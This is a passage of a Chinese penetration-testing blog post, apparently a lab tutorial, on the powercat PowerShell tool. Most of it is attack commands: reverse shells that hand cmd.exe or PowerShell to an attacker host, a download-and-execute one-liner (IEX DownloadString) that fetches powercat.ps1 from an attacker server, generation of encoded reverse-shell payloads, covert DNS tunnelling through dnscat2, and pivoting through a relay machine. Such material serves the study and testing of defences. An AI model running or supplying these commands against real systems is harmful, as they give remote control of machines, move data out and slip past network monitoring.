<h3 id="3-tong-guo-nc-fan-xiang-lian-jie-powercat" id="3、通过nc反向连接powercat">3、通过nc反向连接powercat</h3>
<p>攻击机：<br>
nc -l -p 8888 -vv<br>
目标机：<br>
powercat -c 192.168.136.129 -p 8888 -v -e cmd.exe</p>
<p><img src="/imgss/p29.png" alt=""></p>
<h3 id="4-tong-guo-powercat-fan-hui-powershell" id="4、通过powercat返回powershell">4、通过powercat返回powershell</h3>
<p>目标机：<br>
powershell<br>
IEX (New-Object Net.WebClient).DownloadString(‘<a target="_blank" rel="noopener" href="http://192.168.37.132:8000/powercat.ps1">http://192.168.37.132:8000/powercat.ps1</a>’)<br>
powercat -l -p 9999 -v</p>
<p>攻击机(ep参数用于返回powershell)：<br>
powercat -c 192.168.37.133 -p 9999 -v -ep</p>
<h3 id="5-tong-guo-powercat-chuan-shu-wen-jian" id="5、通过powercat传输文件">5、通过powercat传输文件</h3>
<p>powercat -l -p 9999 -of test.txt -v<br>
powercat -c 192.168.136.133 -p 9999 -i c:\test.txt -v<br>
Get-Content test.txt  查看内容<br>
-i：输入，可写文件名，可以添加字符串，如”“I am test” | powercat -c …“。<br>
-of：输出文件名，可以在文件名前添加路径</p>
<h3 id="6-yong-powercat-sheng-cheng-payload" id="6、用powercat生成payload">6、用powercat生成payload</h3>
<p>(1)反弹shell<br>
生成pyload：<br>
powercat -l 8000 -e cmd -v -g &gt;&gt; shell.ps1<br>
将shell.ps1上传到目标机并执行，然后攻击机执行以下命令，即可获得shell<br>
powercat -c 192.168.136.133 -p 8000 -v</p>
<p><img src="/imgss/p30.png" alt=""><br>
如果想反弹powershell，使用以下命令<br>
powercat -l -p 8000 -ep -v -g &gt;&gt; shell2.ps1</p>
<p>(2)编码过后的paylaod<br>
powercat -c 192.168.136.133 -p 9999 -ep -ge<br>
攻击机执行：<br>
powercat -l -p 9999 -v</p>
<p>-g：生成payload<br>
-ge：生成编码的payload，可以直接使用&quot;powershell -E &lt;编码&gt;&quot; 命令</p>
<p><img src="/imgss/p31.png" alt=""></p>
<h3 id="7-powercat-dns-tong-xin" id="7、powercat-DNS通信">7、powercat DNS通信</h3>
<p>(1)安装<br>
git clone <a target="_blank" rel="noopener" href="https://github.com/iagox86/dnscat2.git">https://github.com/iagox86/dnscat2.git</a><br>
cd dnscat2/server/<br>
gem install bundler<br>
bundle install<br>
(2)使用<br>
攻击机执行：<br>
ruby dnscat2.rb ttpowercat.test -e open --no-cache<br>
通过session -i (id)   来调用某一个shell</p>
<p>目标机执行：<br>
powercat -c 192.168.136.129 -p 53 -dns ttpowercat.test -e cmd.exe<br>
<img src="/imgss/p32.png" alt=""></p>
<h3 id="8-jiang-powercat-zuo-wei-tiao-ban" id="8、将powercat作为跳板">8、将powercat作为跳板</h3>
<p>kali：攻击机<br>
2008：目标机<br>
win7：跳板机</p>
<p>在server2008中执行：<br>
powercat -l -v -p 9999 -e cmd.exe<br>
win7执行：<br>
powercat -l -v -p 8000 -r tcp:10.10.10.129:9999<br>
kali执行：<br>
nc 192.168.56.130 8000 -v</p>
<p>也可以使用DNS协议<br>
win7执行：<br>
powercat -l -p 8000 -r dns:192.168.56.129::ttpowercat.test<br>
kali执行：<br>
ruby dnscat2.rb ttpowercat.test -e open --no-cache<br>
server2008执行：<br>
powercat -c -10.10.10.128 -p 8000 -v -e cmd.exe</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/%E5%B7%A5%E5%85%B7/" rel="tag"># 工具</a>
              <a href="/tags/%E5%8D%8F%E8%AE%AE/" rel="tag"># 协议</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/03/19/ICMP%E9%9A%A7%E9%81%93%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8/" rel="prev" title="'ICMP隧道工具的使用'">
                  <i class="fa fa-chevron-left"></i> 'ICMP隧道工具的使用'
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/03/28/%E6%9F%90%E5%85%AC%E5%8F%B8%E9%9D%A2%E8%AF%95%E9%A2%98/" rel="next" title="'某公司面试题'">
                  '某公司面试题' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0_c|imb</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
